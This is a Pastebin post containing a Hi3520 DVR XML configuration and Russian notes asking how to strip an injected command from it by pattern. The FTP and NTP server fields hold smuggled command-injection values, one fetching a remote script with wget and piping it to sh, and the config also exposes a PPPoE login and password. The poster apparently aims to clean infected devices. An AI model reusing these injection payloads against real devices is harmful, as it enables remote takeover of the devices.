Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # archive of https://pastebin.com/5T9LN2VU
- # seeing similar exploits in the wild
- есть такой конфиг
- <?xml version="1.0" encoding="UTF-8"?>
- <DVR Platform="Hi3520">
- <Service>
- <DHCP Enable="False"/>
- <Static Enable="False" IP="192.168.10.8" Mask="255.255.255.0" Gateway="192.168.10.1" DNS="8.8.8.8"/>
- <PPPoE Enable="True" User="88284187@hinet.net" Password="2dgurlou"/>
- <Mobile Enable="False" User="" Password="" PIN="" APN="" Dial=""/>
- <HTTPD Enable="True" Port="80" SSLPort="443" RTSP="False"/>
- <DDNS Enable="False" Server="dyndns.org" Format="http://<user>:<pass>@members.dyndns.org/nic/update?hostname=<host>&myip=<ip>" Host="" User="" Password=""/>
- <NTP Enable="True" Interval="86400" Server=" & sh /zconf/dvr_help"/>
- <Mail Enable="False" Server="" SSL="False" Port="25" User="" Password="" From=""/>
- <FTP Enable="False" Server="time.nist.gov&wget http://188.209.49.244/f -O-|sh" Port="21" Username="" Password="" Directory=""/>
- <QoS Enable="False" Limit="8192"/>
- <P2P Uid="" Expiry=""/>
- <Wifi Enable="False" ESSID="" Password=""/>
- </Service>
- </DVR>
- надо удалить ;wget http://188.209.49.244/f -O-|sh по маске. адреса могут быть разные
- возможно где-то пробелы еще
Add Comment
Please, Sign In to add comment